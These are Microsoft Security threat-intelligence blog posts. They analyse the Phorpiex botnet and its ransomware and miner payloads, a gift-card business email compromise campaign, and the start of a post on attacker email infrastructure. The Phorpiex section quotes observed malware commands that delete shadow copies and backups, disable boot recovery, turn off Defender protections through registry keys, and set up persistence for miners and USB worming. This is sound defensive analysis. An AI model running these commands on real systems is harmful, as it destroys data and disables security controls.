
From December 2020 to February 2021, the Phorpiex bot loader was encountered in 160 countries, with Mexico, Kazakhstan, and Uzbekistan registering the most encounters.

Column chart showing top 10 countries with most Phorpiex encounters

Figure 2. Countries with the most encounters of the Phorpiex bot loader

In December 2020 and January 2021, we observed non-weaponized staging of Knot ransomware on Phorpiex servers. In February, we also detected commodity malware such as Mondfoxia (also known as DiamondFox) in these servers. These recent developments indicate new loader and monetization strategies under active development.

The combination of the wide variety of infection vectors and outcomes makes the Phorpiex botnet appear chaotic at first glance. However, for many years Phorpiex has maintained a consistent internal infrastructure using similar domains, command-and-control (C2) mechanisms, and source code.

The wide range of infection vectors used by Phorpiex requires a unified security approach that ensures protection is delivered on the endpoint, network, email, and applications. Microsoft 365 Defender’s advanced threat protection technologies detect malicious activity in each of these domains. Moreover, the correlation of these cross-domain threat data surfaces additional malicious activity, allowing Microsoft 365 Defender to provide coordinated and comprehensive protection against Phorpiex.

Bot distribution and installation

Phorpiex maintains and expands its network of bot-infected computers by distributing the Phorpiex bot loader. In 2020 and 2021 we observed the bot loader being spread through Phorpiex bot-delivered emails with .zip or other archive file attachments, downloaded from fake download sites for software (such as photo editing software, screensaver, or media players), or downloaded by other malware also delivered through email. These multiple entry points demonstrate the modular nature of the malware economy.

Regardless of distribution mechanism, however, the bot loader operates in a fairly uniform fashion. It uses three distinct types of C2 to fulfil different goals during and after installation:

  • Downloading the Phorpiex malware implant
  • Downloading updates to the Phorpiex implant and new exploit modules
  • Checking in with C2 infrastructure to deliver cryptocurrency or return data

The malware implant is initially downloaded from sites such as trik[.]ws (historically) or, more recently, a malware hosting repository, worm[.]ws. We are also noticing a shift to using more dedicated IP-based C2 and delivery sites, such as 185[.]215[.]113[.]10 and 185[.]215[.]113[.]8. A notable Phorpiex behavior is the downloading of numbered modules, typically numbered 1-10, with URL paths such as <domain>.com/1, <domain>.com/2, <domain>.com/3, continuing this pattern for as many additional components as needed. As these downloads do not happen through standard web traffic, network-level protection is necessary to prevent malicious downloads. In a very recent development, we observed that most Phorpiex bot loader malware have  abandoned branded C2 domains and have completely moved to using IPs or DGA domains. However, as in the past, the operators neglected to register all the potential sites that the DGA domains resolve to.

When downloaded and run, the implant attempts to connect to legitimate external sites like WIPMANIA.com to get IP information. It does this repeatedly during subsequent check-ins, and then begins connecting to hardcoded C2 servers. During these check-ins, the implant checks the device’s regional settings and exits if it’s operating in a non-desired region, such as Ukraine. Favored regions include countries in East Asia as well as English-speaking countries.

The loader modules and updates are pulled from a variety of attacker-owned domains. These domain-names typically begin with a second-level domain (2LD) of TLDR, TSRV, or THAUS and end with an assortment of unorthodox TLD such as .WS, .TOP, .RU, .CO, .TO, .SU., .CC, and .IO. As has been pointed out by other researchers, the TSRV and TLDR are likely references to “Trik Server” or “Trik Loader”, as many of the internals of the malware use Trik as proprietary name.

Regular connections to these attacker-owned domains continue during infection, such that devices that have been infected for months receive new loader versions and capabilities. Modules downloaded from C2 can include additional malware, ransomware, cryptocurrency mining functionality, worming functionality, and the Phorpiex mailing botnet functionality. It is most common for a bot to be participating in mailing and crypto mining, as these seem to be driving revenue generation for the operators during non-ransomware initiatives.

The bot also establishes persistence and attempts to disable security controls. This includes modifying registry keys to disable firewall and antivirus popups or functionality, overriding proxy and browser settings, setting the loader and executables to run at startup, and adding these executables to the authorized application lists. A sample of the keys changed is below, with minor changes from version to version of the loader:

  • \FirewallPolicy\StandardProfile\AuthorizedApplications\List
  • \Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Services
  • \Microsoft\Security Center\AntiVirusOverride
  • \Microsoft\Security Center\AntiVirusDisableNotify
  • \Microsoft\Security Center\FirewallOverride
  • \Microsoft\Security Center\FirewallDisableNotify
  • \Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
  • \Microsoft\Security Center\UpdatesOverride
  • \Microsoft\Security Center\UpdatesDisableNotify
  • \Microsoft\Windows NT\CurrentVersion\SystemRestore
  • \Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
  • \Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
  • \Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable

Enabling tamper protection in Microsoft Defender for Endpoint prevents the bot from making modifications related to Microsoft Defender services. Microsoft Defender for Endpoint automatically cleans up changes made by the bot (if any) during threat cleanup and remediation. Security operations teams can use advanced hunting capabilities to locate these and similar modifications. Administrators can also disable “Local Policy Merge” to prevent local firewall policies from getting in effect over group policies.

As the bot loader updates, the key values change to reflect new files, randomized file paths, and masqueraded system files. The example below illustrates a change from SVCHOST to LSASS:

KEY NAME: HKEY_CURRENT_USER\[ID]\Software\Microsoft\Windows\CurrentVersion\Run
OLD VALUE: C:\1446621146296\svchost.exe
NEW VALUE: C:\19197205241657\lsass.exe

At varying intervals, the bot implant collects lists of files and exfiltrates that data to external IP addresses leased by the attacker, many of which also serve as C2. When additional malware is installed, the pull is initiated from the implant itself. The malware is staged on the Phorpiex operators’ servers prior to new campaigns or on the shared sites such as worm[.]ws.

The bot checks in routinely, often weekly and sometimes even daily. It does this to upload any outcomes from the various modules that the bot installs, such as coin mining deposits or spam activity.

In addition to detecting and blocking the bot malware through its endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities, Microsoft Defender for Endpoint’s network protection defends against botnet activities like connecting to attacker-controlled servers, mimicking system files, and downloading implants and additional payloads.

Self-spreading via remote drives

One of the more unique and easily identifiable Phorpiex behavior when it spread primarily via USB involves a check that occurs routinely for all connected remote drives. The bot then creates a series of hidden folders on those drives with underscores (e.g., “__”) and then changes the registry attributes to make these appear invisible to the user. The bot then copies all its file configurations and include a malicious DriveMgr.exeI, a copy of the loader, as well as  a .lnk file that runs the malware when opened. This activity has been largely consistent since 2019. This functionality offers a self-spreading mechanism that offers a backup way to expand the bot implant base. Commands consistent with this Phorpiex worming activity are:

  • ShEllExECutE=__\\DriveMgr.exe
  • “cmd.exe” /c start __ & __\DriveMgr.exe & exit

Microsoft Defender for Endpoint offers multiple layers of protection against USB threats. This includes real-time scanning of removable drives and attack surface reduction rule to block untrusted and unsigned processes that run from USB. Microsoft Defender for Endpoint also enables organizations to monitor and control removable drives, for example allow or block USB based on granular configurations, and monitor USB activities.

Phorpiex as a mailing botnet

For several years, Phorpiex used infected machines to deliver extortion, malware, phishing, and other content through large-scale email campaigns. These emails span a large set of lures, subject lines, languages, and recipients, but there are key sets of characteristics that can identify emails sent from the Phorpiex botnet:

  • Spoofed sender domain, sender username, and sender display name
  • Sender domain of 4 random digits
  • Sender username using a generic name with a variety of numbers
  • Subjects or lures referencing singular names, heights and weights, surveillance
  • Body of the message often referencing dating services or extortion material for ransom
  • Presence of Bitcoin, DASH, Etherium, or other cryptocurrency wallets
  • ZIP files or other file types purporting to be images such as JPG files or photo types

These patterns include language more commonly used in consumer extortion emails, which reference having illicit photos or videos of the recipient. These are also the same lures that are used to distribute the bot installer as well as ransomware or other malware. The messages often include old passwords of individuals gathered from publicly available lists, a method that attackers use to add credibility whether the mail is received in a corporate environment or at home.

Microsoft Defender for Office 365 detects malicious emails sent by the Phorpiex botnet. These include the extortion and phishing emails, as well as messages carrying malware, whether the Phorpiex loader itself or other malware. Microsoft Defender for Office 365 users AI and machine learning to detect user and domain impersonation, informed by its comprehensive visibility into email threats as well as through in-depth research like this.

Spam and extortion campaigns

Phorpiex is well known for illicit image or video-based extortion phish and spam campaigns, also known as “sextortion”. These campaigns target a large variety of regions and languages, which is a different set of targets from bot distribution activities. These generally do not deliver malware directly. They are meant to collect revenue for the operator by asserting that they have already compromised a device and have access to damaging material regarding the recipient.

Sextortion campaigns have been quite popular in recent years and generally require payment from the victim in cryptocurrency. We observed Phorpiex operators requiring payment primarily through Bitcoin and Dash. Examples of one such cryptocurrency profit volume from a campaign in late February 2021 targeting English speaking users is below, with the subject “Payment from your account”.

There are several public monitors of extortion wallets operated by Phorpiex, which have seen the operators of the botnet running numerous wallets during any given week. We observed the below example in which an operator requested $950 from users and accumulated over $13,000 in 10 days.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 3. Cryptocurrency profit volume from a single wallet used in spam extortion campaign in late February 2021. Data from BitInfoCharts.

In late 2020 and early 2021 we also observed this extortion scheme exploiting fears about security vulnerabilities in teleconferencing applications such as Zoom. The messages claimed that a vulnerability is what allowed the operators to capture their extortion material.

Screenshot of sample email used in campaign

Figure 4. Example of an extortion email lure from late 2020

Screenshot of sample email used in campaign

Figure 5. Example of a Korean language extortion email lure from early 2021

In addition to the examples above, Phorpiex is often distributed via business email compromise and contain no links or URLs. This hampers many automatic detection capabilities an organization might have in place.

Phishing, malware, and ransomware campaigns

Phorpiex-powered phishing campaigns as well as bot implant installations deliver secondary malware as well as standard extortion and spam. The tactics involving the spread of emails are the same, with the only differences being in the attachments or links. Malware involving malicious Office documents is interspersed with deliveries of the bot implant or direct ransomware deliveries, which are often contained within .ZIP attachments.

Since 2019, many of the malware-carrying emails from Phorpiex use the same lures, subject lines, and attachment file names. The emails use a randomly generated feminine name in the subject or reference an embarrassing or improperly obtained photo, and either contain extortion or deliver ransomware. As part of the social engineering lure, he malware attachments masquerade as .jpg files or other file types, while appearing as .zip or .js files.

Screenshot of sample email campaign

Figure 6. Example of an email lure including malicious ZIP attachment masquerading as an image of an actress

In Summer and Fall 2020 many new Phorpiex infections began to spread using archive files to deliver BitRansomware and Avaddon. Avaddon only began spreading in mid to late 2020 and its distribution seems to have been tightly coupled with Phorpiex since its inception.

In the month of August 2020, there was also an increase in the number of bot implants installed on devices, corresponding with the ransomware increase. At this time, most instances of ransomware perpetrated by Phorpiex were carried through the bot implant itself.

Phorpiex as malware delivery botnet

In addition to operating as a mailing botnet, Phorpiex has evolved to deliver other malware as well, most notably cryptocurrency mining malware and ransomware.

Cryptocurrency mining malware

In 2019 Phorpiex started utilizing an XMRIG miner to monetize the hosts with Monero. This module is included in almost all bot installations at the time of infection and communicates primarily over port 5555. This behavior might be coupled with other malware, but in this instance, it is associated with the masqueraded system process used by the rest of the Phorpiex implant (i.e., SVCHOST.exe or LSASS.exe).

The miner is downloaded as a module masquerading as WINSYSDRV.exe It stores its configuration locally and checks it periodically. The miner does this from additional masqueraded system processes injected into legitimate processes to read its configuration and to mine.

The WINSYSDRV.exe file routinely kicks off a series of heavily nested processes preceded by a PING with a long wait, which is intended to avoid sandboxes. This command is shown below:

cmd.exe /C ping [INTERNAL IP] -n 8 -w 3000 > Nul & Del /f /q “C:\ProgramData\PnQssBdbSh\winsysdrv.exe” & “C:\Users\[USER]\AppData\Local\Temp\winsysdrv.exe”

In prior versions, this command utilized the legitimate but hijacked WUAPP.exe process. Recently we have seen NOTEPAD.exe used to read the path, which is a variant of C:\ProgramData\[RandomString]cfg:

  • “C:\Windows\System32\wuapp.exe” -c “C:\ProgramData\ADwXcSSGvY\cfgi” (2019-2020)
  • “C:\Windows\System32\wuapp.exe” -c “C:\ProgramData\PnQssBdbSh\cfgi” (2020)
  • “notepad.exe” -c “C:\ProgramData\PnQssBdbSh\cfgi” (2020-2021)
  • “notepad.exe” -c “C:\ProgramData\PnQssBdbSh\cfg” (2020-2021)

In addition to mining Monero, versions of the bot loader also upload to Bitcoin wallets. We were able to scrape those addresses via downstream executables dropped by the Phorpiex loader masquerading as SVCHOST.exe or LSASS.exe. Below is an example of the balance in one such wallet address that was active from September to November 2020, embedded in a specific sample.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 7. Cryptocurrency profit from a single wallet used in a miner dropped on an infected machine from September to November 2020. Data from BitInfoCharts.

In February of 2021, infected implants also downloaded additional Etherium miners. These miners create scheduled tasks are labeled “WindowsUpdate” but run the miner every minute. The miners search for graphics cards as well as other resources to use for mining with an ethermine.org mining pool. Here’s an example task creation:

schtasks /create /sc minute /mo 1 /tn WindowsUpdate /tr %TEMP%\System.exe

Microsoft has also observed Phorpiex variants with cryptocurrency-clipping functionality accompanying the installation of the loader. In these instances, the malware checks clipboard values for a valid cryptocurrency wallet ID. If it finds one, it sets its own hardcoded value. This method allows attackers to profit from existing mining installations or prior malware without having to bring in new software or remove old instances.

Microsoft Defender for Endpoint detects and blocks cryptocurrency mining malware and coin mining activity in general. To continue enhancing this detection capability, Microsoft recently integrated Intel Threat Detection Technology (TDT) into Microsoft Defender for Endpoint, allowing our endpoint detection and response capabilities to use silicon-based threat detection to better protect against coin mining malware.

Ransomware

Phorpiex has been associated with multiple ransomware families through the years. Phorpiex either delivers ransomware on behalf of other groups using those operators’ infrastructure or host the ransomware themselves. The latter is more common in the case of commodity kits like Avaddon and Knot that the Phorpiex operators may develop themselves.

As recently as February 2021, Avaddon was under active development. Like the Phorpiex loader itself, Avaddon performs language and regional checks for Russia or Ukraine before running to ensure only favored regions are targeted.

The initial Avaddon executable is located in the TEMP folder, and it generally uses a series of random characters as file extension for encrypted files. Before deleting backups and encrypting the drive, it validates that UAC is disabled by checking if certain registry keys are set to “0”, modifying the value if not:

  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = “0”
  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = “0”
  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = “1”

After achieving the privilege level needed, encryption usually occurs on the individual machine without lateral movement, though that is subject to change based on the operator’s monetization strategy. The procedure for deleting backups, like most ransomware, is performed with the following commands:

  • cmd /c wmic.exe SHADOWCOPY /nointeractive
  • cmd /c wbadmin DELETE SYSTEMSTATEBACKUP
  • cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  • cmd /c bcdedit.exe /set {default} recoveryenabled No
  • cmd /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  • cmd /c vssadmin.exe Delete Shadows /All /Quiet

Microsoft Defender for Endpoint detects and blocks the ransomware. It also detects and raises the following alerts for the encryption and backup deletion behaviors, enabling security operations teams to be notified and immediately respond to ransomware activity on their environment:

  • Ransomware behavior detected in the file system
  • File backups were deleted

We have observed that the external commands and behaviors of the Avaddon ransomware have largely remained the same since its introduction in June-July 2020. This includes the tendency to masquerade as the system file Taskhost.exe. Avaddon, which demands a ransom in Bitcoin equivalent to $700, is still active today and being actively distributed by Phorpiex using new bot loaders that are not substantially different in behavior. Microsoft Defender for Endpoint continues to provide durable protection against these new campaigns.

Other ransomware is slightly less common lately, but in December 2020, a non-weaponized version of Knot ransomware was staged on Phorpiex-operated servers. It did not seem to have had any infections yet as this may have been a test version. This ransomware shares a high degree of similarity to the Phorpiex loader itself and improved versions have not yet been seen. Like Avaddon, Knot typically demands relatively smaller sums of money in Bitcoin, equivalent to $350. The ransom notes generally require Bitcoin payment to a wallet, though no payments seem to have been made that month.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 8. Cryptocurrency profit volume from a single wallet attached to a Knot ransomware sample in early 2021, showing no payments of the asking price. Data from BitInfoCharts.

Defending against botnets and associated activity

Botnets drive a huge portion of the malware economy, and as the resilience of Phorpiex shows, they evolve to adapt to the ever-changing threat environment. Our many years of experience analyzing, monitoring, and even working with law enforcement and other partners to take down botnets tell us that alternative infrastructures rise as attackers try to fill in the void left by disrupted botnets. Typically, new infrastructures are born as a result of these movements, but in the case of Phorpiex, an established botnet adapts and takes over.

The wide range of malicious activities associated with botnets, as we detailed in this in-depth research into Phorpiex, represent the spectrum of threats that organizations face today: various attack vectors,  multiple spreading mechanisms, and a diverse set of payloads that attackers can change at will. To combat these threats, organizations need security solutions that deliver cross-domain visibility and coordinated defense.

Microsoft 365 Defender leverages the capabilities and signals from the Microsoft 365 security portfolio to correlate threat data from endpoints, email and data, identities, and cloud apps to provide comprehensive protection against threats. Microsoft Defender for Endpoint detects and blocks malware, other malicious artifacts, and malicious behavior associated with botnet activity, as well as the deployment of secondary payloads like cryptocurrency miners and ransomware. Features like attack surface reduction, tamper protection, and security controls for removable media further help prevent these attacks and harden networks against threats in general. Microsoft Defender for Office 365 detects the malicious attachments and URLs in emails generated by the mailing operations of the Phorpiex botnet.

Our industry-leading visibility informs AI and machine learning technologies that power the automatic prevention, detection, and remediation of threats, as well as the rich set of investigation tools available to defenders for hunting, analyzing, and resolving attacks. The recently generally available unified Microsoft 365 Defender security center integrates capabilities so defenders can manage all endpoint, email, and cross-product investigations, configuration, and remediation with a single portal.

Our understanding of how botnets operate and evolve, through in-depth research like this, further enriches our ability to continue delivering defenses against the threats of today and the future. Learn how Microsoft 365 Defender stops attacks with automated, cross-domain security and built-in AI.

 

Microsoft 365 Defender Threat Intelligence Team

 

The post Phorpiex morphs: How a longstanding botnet persists and thrives in the current threat environment appeared first on Microsoft Security.

Business email compromise campaign targets wide range of orgs with gift card scam

May 6th, 2021 No comments

Cybercriminals continue to target businesses to trick recipients into approving payments, transferring funds, or, in this case, purchasing gift cards. This kind of email attack is called business email compromise (BEC)—a damaging form of phishing designed to gain access to critical business information or extract money through email-based fraud.

In this blog, we want to share our investigation of a BEC campaign that used attacker-created email infrastructure to facilitate gift card theft. In this campaign, we found that attackers targeted organizations in the consumer goods, process manufacturing and agriculture, real estate, discrete manufacturing, and professional services sectors using typo-squatted domains to make the emails appear as if they were originating from valid senders.

BEC emails are intentionally designed to look like ordinary emails, appearing to come from someone the targeted recipient already knows, but these campaigns are more complex than they appear. They require behind-the-scenes operations, preparation, and staging. Advanced email solutions like Microsoft Defender for Office 365 detect and block these elusive threats. Defender for Office 365 safeguards organizations against the threat posed by emails and URLs associated with BEC campaigns.

In our blog titled Business email compromise: How Microsoft is combating this costly threat, we wrote about the process of orchestrating BEC attacks and discussed Microsoft strategies to combat these threats. Additionally, Microsoft released a three-part blog series on BEC scams titled Business Email: Uncompromised, which offers an in-depth look into the evolution of BEC attacks and how Microsoft Defender for Office 365 employs multiple native capabilities to help customers defend against them.

Understanding the BEC gift card scam

Imagine this work-from-home scenario for an executive assistant (EA):

It’s a typical day at work for you as a remote EA. You prepare your to-do list for the day and check your CEO’s calendar for their scheduled meetings, all while communicating with other EAs via email and chat. You categorize your emails and prioritize your tasks—nothing out of the ordinary.

In the middle of the workday, you get an email appearing to come from your boss, requesting that you purchase gift cards to give to the team as an incentive for their hard work during the pandemic.

The request seems a little strange, you think. Maybe it was a spur-of-the-moment initiative. But you’re a rock star assistant and decide to go ahead and purchase the gift cards using department funds.

You reply to your boss’s email with the gift card codes. After a while of not hearing back, you finally ping them on chat to make sure they received them. Your boss expresses their confusion in response to your chat message–they never requested gift cards for the team.

This is a classic business email compromise (BEC) scenario.

Defining BEC attacks

BEC is a type of phishing attack that targets organizations, with the goal of stealing money or critical information. Our blog post Business Email: Uncompromised – Part One provides examples of real-world BEC attacks and how to identify key visual cues for spotting attacks.

The emails used in BEC attacks appear simple, but there is a wide level of complexity behind them—from reconnaissance and targeting, social engineering, to the delivery infrastructure.

If you’re wondering why these complex threats are crafted for a seemingly insignificant payout, think again. BEC continuously poses a serious area of concern, with attacks totaling approximately $1.8 billion in victim losses in 2020, according to the FBI’s Internet Crime Compliant Center (IC3). While attacks similar to the BEC gift card scenario we described earlier can add up to a hefty sum, many BEC attackers are known to target significantly larger transactions, such as intercepting and redirecting wire transfers, ultimately making BEC scams a highly profitable cybercriminal operation.

Conducting reconnaissance, social engineering for BEC attacks

For BEC actors to know who to target and who to impersonate, they frequently conduct reconnaissance prior to launching attacks. Social media sites, “about us” pages on a company’s website, or news articles about a targeted company may all give actors the information they need to craft a specific, believable message intended for a chosen victim. In our blog post, Business Email: Uncompromised – Part Two, we discuss the multiple stages of a BEC attack, from identifying target organizations to the attackers setting up transaction details.

BEC gift card campaign seen targeting various organizations

In this campaign, attackers targeted a variety of companies in the consumer goods, process manufacturing and agriculture, real estate, discrete manufacturing, and professional services sectors.

Figure 1. Breakdown of email volume sent to the top targeted industries we observed in this BEC campaign

This specific campaign started with an extremely vague request, such as “I need you to do a task for me” or “Let me know if you’re available.” The message body contained a few details related to the target to make the email seem legitimate.

Figure 2. A sample BEC email impersonating an executive

In the Figure 2 screenshot, the attacker signed the email as “Steve,” which is the name of an executive at this targeted organization. Additionally, the email was addressed to someone who worked with the impersonated executive while the subject line contained the recipient’s first name.

If the recipient replied to the email, the attacker responded with a more specific demand for a gift card. In other cases, attackers skipped the generic email altogether and jumped directly to the gift card demand, using a method of generating fake replies to add legitimacy to the email. We discussed the anatomy of BEC attacks in this blog post and detailed telltale signs of common phishing techniques.

Figure 3. A sample BEC email targeting the education sector demanding a gift card purchase

In this case, the attacker pretended to be a teacher at a K-12 institution and claimed that they were unable to leave their house to buy a gift card. In addition, the email subject contained the name of the purported teacher followed by “SICK” in the subject line.

The email body included a message requesting the recipient to purchase a physical gift card for them. According to our past BEC research, attackers frequently used the stolen gift card codes for websites that allow them to redeem and convert gift cards to cryptocurrency or other foreign currencies. The funds generated from cashing out gift cards can then be transferred to attacker-owned accounts untraceably.

In this campaign, we noticed that the email also contained a fake reply, wherein the threat actor included what appeared to be an original message in the email body, with the subject line starting with “Re:”. The ‘From’ email address in the crafted original message used yahoo.com, but the ‘From address of the actual email was a typo-squatted domain spoofing yahoo.com, hinting that the email reply was indeed fake.

Figure 4. The attacker used a typo-squatted domain that spoofed a Yahoo account

Upon closer examination, the actors had taken the extra step of faking the In-Reply-To and References headers, which added an extra air of legitimacy to the email. An email’s In-Reply-To header contains the unique Message ID of the previous message in the reply thread, and the References header contains the unique Message IDs from all previous messages in the reply thread. In a typical email that is not a reply, these two header fields would be blank.

Figure 5. Spoofed fields for the In-Reply-To and References headers

As shown in Figure 5, both the In-Reply-To and References headers are populated with Message IDs associated with legitimate email providers, including yahoo.com, which this campaign spoofed. We can see that these headers were manually added by the attacker as made apparent by the ya00h0o.com sender. In addition, the email’s HTML contents show that the message was manually typed to appear as though it’s a reply.

Filling these headers in made the email appear legitimate and that the attacker was simply replying to the existing email thread between the Yahoo and Outlook user. This characteristic sets this campaign apart from most BEC campaigns, where attackers simply include a real or specially crafted fake email, adding the sender, recipient, and subject, in the new email body, making appear as though the new email was a reply to the previous email.

Delivery infrastructure

For this campaign, attackers registered typo-squatted domains for over 120 different organizations to impersonate actual businesses. We observed patterns in using the correct domain name but an incorrect TLD, or slightly spelling the company name wrong. These domains were registered just days before this email campaign began.

We noted that these domains did not have domain privacy enabled, nor were they under the EU’s GDPR protections. Each domain used a unique registrant name and email. The registrant names appeared to be autogenerated random first names and last names, and the registrant contact email used a free email service such as Gmail or mail.com with accounts that were often simply <first name>.<last name>@gmail.com or similar. Each name was used to register just one domain used in the campaign, which made pivoting to related domains more challenging.

Another observation about this campaign is that the registered domains did not always align with the organization being impersonated in the email. This could have been a mistake on the actor’s part, as BEC domains are typically designed to closely mimic the impersonated organization. For example, an actor may register microsoft.xyz or micrrosoft.com, both of which would normally be used to send emails pretending to originate from Microsoft. In this campaign, those types of homoglyphed and typo-squatted domains were used to send emails pretending to originate from a variety of organizations.

Our in-depth research into this campaign’s delivery infrastructure directly informed the protection Microsoft provides against this BEC threat.

How Microsoft security solutions combat BEC campaigns

Microsoft Defender for Office 365 defends organizations against malicious threats posed by this BEC campaign.

For a better understanding on how Defender for Office 365 protects against BEC attacks, you can refer to our blog post about detecting user and domain impersonation at scale in a fast-evolving attack landscape. Email authentication in Defender for Office 365 allows you to verify whether email messages from a sender are legitimate and come from expected sources for that email domain. Email standards like SPF, DKIM, and DMARC are evaluated by Office 365 to prevent domain spoofing. Our spoof intelligence technology uses advanced algorithms to observe the sending patterns of domains and flag anomalies.

You can strengthen your security posture further by empowering employees through user awareness tools in Defender for Office 365 that are integrated into products like Outlook and Office 365 apps. For instance, attack simulation training in Defender for Office 365 allows you to craft and run realistic BEC-like attack scenarios in your organization.

As these threats are always changing and evolving, Microsoft has dedicated research teams who constantly stay abreast of the changing threat landscape and combine that knowledge with our extensive customer telemetry data to stay current on BEC and other attacks.

Microsoft’s portfolio of security products processes trillions of signals every day. This signal base drives constant improvements to the artificial intelligence layers backing our protection and detection systems. Microsoft threat analysts leverage these signals to track actors, infrastructure, and techniques used in phishing and BEC attacks to ensure Defender for Office 365 stays ahead of current and future threats.

Defender for Office 365 equips security operations teams with automated threat investigation and response capabilities to understand, simulate, and prevent email-related threats. Defender for Office 365 enables you to define threat protection policies to set up the appropriate level of protection for your organization, while allowing you to view and monitor real-time reports. Learn more about Microsoft Defender for Office 365.

 

 Microsoft 365 Defender Threat Intelligence Team

The post Business email compromise campaign targets wide range of orgs with gift card scam appeared first on Microsoft Security.

What tracking an attacker email infrastructure tells us about persistent cybercriminal operations

February 1st, 2021 No comments

From March to December 2020, we tracked segments of a dynamically generated email infrastructure that attackers used to send more than a million emails per month, distributing at least seven distinct malware families in dozens of campaigns using a variety of phishing lures and tactics. These campaigns aimed to deploy malware on target networks across the world, with notable concentration in the United States, Australia, and the United Kingdom. Attackers targeted the wholesale distribution, financial services, and healthcare industries.

By tracing these campaigns, we uncovered a sprawling infrastructure that is robust enough to seem legitimate to many mail providers, while flexible enough to allow the dynamic generation of new domain names and remain evasive. Shared IP space, domain generation algorithm (DGA) patterns, subdomains, registrations metadata, and signals from the headers of malicious emails enabled us to validate our research through overlaps in campaigns where attackers utilized multiple segments of purchased, owned, or compromised infrastructure. Using the intelligence we gathered on this infrastructure, we were at times able to predict how a domain was going to be used even before campaigns began.

This email infrastructure and the malware campaigns that use it exemplify the increasing sophistication of cybercriminal operations, driven by attackers who are motivated to use malware infections for more damaging, potentially more lucrative attacks. In fact, more recent campaigns that utilized this infrastructure distributed malware families linked to follow-on human-operated attacks, including campaigns that deployed Dopplepaymer, Makop, Clop, and other ransomware families.

Our deep investigation into this infrastructure brings to light these important insights about persistent cybercriminal operations:

  • Tracking an email infrastructure surfaces patterns in attacker activity, bubbling up common elements in seemingly disparate campaigns
  • Among domains that attackers use for sending emails, distributing malware, or command-and-control, the email domains are the most likely to share basic registration similarities and more likely to use DGA
  • Malware services rely on proxy providers to make tracking and attribution difficult, but the proxies themselves can provide insights into upcoming campaigns and improve our ability to proactively protect against them
  • Gaining intelligence on email infrastructures enables us to build or improve proactive and comprehensive protections like those provided by Microsoft Defender for Office 365 to defend against some of the world’s most active malware campaigns

While there is existing in-depth research into some of these specific campaigns, in this blog we’ll share more findings and details on how email distribution infrastructures drive some of the most prevalent malware operations today. Our goal is to provide important intelligence that hosting providers, registrars, ISPs, and email protection services can use and build on to protect customers from the threats of today and the future. We’ll also share insights and context to empower security researchers and customers to take full advantage of solutions like Microsoft Defender for Office 365 to perform deep investigation and hunting in their environment and make their organizations resilient against attacks.

The role of for-sale infrastructure services in the threat ecosystem

We spotted the first segment of the infrastructure in March, when multiple domains were registered using distinct naming patterns, including the heavy use of the word “strange”, inspiring the name StrangeU. In April, a second segment of the infrastructure, one that used domain generation algorithm (DGA), began registration as well. We call this segment RandomU.

The emergence of this infrastructure in March dovetailed with the disruption of the Necurs botnet that resulted in the reduction of service. Before being disrupted, Necurs was one of the world’s largest botnets and was used by prolific malware campaign operators such as those behind Dridex. For-sale services like Necurs enable attackers to invest in malware production while leasing the delivery components of their activities to further obfuscate their behavior. The StrangeU and RandomU infrastructure appear to fill in the service gap that the Necurs disruption created, proving that attackers are highly motivated to quickly adapt to temporary interruptions to their operations.

Graph showing timeline of the Necurs takedown and the staging and operation of StrangeU and RandomU

Figure 1. Timeline of staging and utilization of the email infrastructure

At first, the new email infrastructure was used infrequently in campaigns that distributed highly commodity malware like Mondfoxia and Makop. Soon, however, it attracted the attention of Dridex and Trickbot operators, who began using the infrastructure for portions of their campaigns, sometimes entirely and sometimes mixed with other compromised infrastructure or email providers.

Analyzing these mail clusters provides insight into how human the tangled web of modular attacker infrastructure remains. From unifying key traits in registration and behavior to the simple and effective techniques that the wide variety of malware uses, attackers’ goals in this diversification point toward combatting automated analysis. However, these same shared characteristics and methods translate to insights that inform resilient protections that defend customers against these attacks.

Domain registration and email infrastructure staging

On March 7, 2020, attackers began registering a series of domains with Namecheap using sets of stolen email addresses, largely from free email services like mail.com, mail.ru, list.ru, and others. These domains all had similar characteristics that could be linked back to various similarities in registration. Almost all of the registered domains contained the word “strange” and were under the .us TLD, hence the name StrangeU. The use of .us TLD prevented domain or WHOIS privacy services—often used to obfuscate domain ownership and provenance—which are prohibited for this TLD.

To circumvent tracking and detection of these domains, attackers used false registration metadata. However, there was heavy crossover in the fake names and email addresses, allowing us to find additional domain names, some of which could be tied together using other keywords as shown in the list below, and fingerprint the domain generation mechanism.

The StrangeU domains were registered in early March 2020 and operated in continuous small bursts until April, when they were used for a large ransomware campaign. Following that, a new campaign occurred fairly regularly every few weeks. Registration of new domains continued throughout the year, and in September, the StrangeU infrastructure was used in conjunction with a similar infrastructure to deliver Dridex, after which these domains were used less frequently.

This second mailing segment, RandomU, employed a different DGA mechanism but still utilized Namecheap and showed a more consistent through line of registration metadata than its StrangeU counterpart. This infrastructure, which surfaced in April, was used infrequently through the Spring, with a surge in May and July. After the Dridex campaign in September in which it was used along with StrangeU, it has been used in two large Dridex campaigns every month.

Table listing observed patterns in StrangeU and RandomU infrastructures

Figure 2. Common patterns in domains belonging to the email infrastructure

The StrangeU and RandomU segments of domains paint a picture of supplementing modular mailing services that allowed attackers to launch region-specific and enterprise-targeting attacks at scale, delivering over six million emails. The two segments contained a standard barrage of mailing subdomains, with over 60 unique subdomains referencing email across clusters, consistent with each other, with each domain having four to five subdomains. The following is a sample of malware campaigns, some of which we discuss in detail in succeeding sections, that we observed this infrastructure was used for:

  • Korean spear-phishing campaigns that delivered Makop ransomware in April and June
  • Emergency alert notifications that distributed Mondfoxia in April
  • Black Lives Matter lure that delivered Trickbot in June
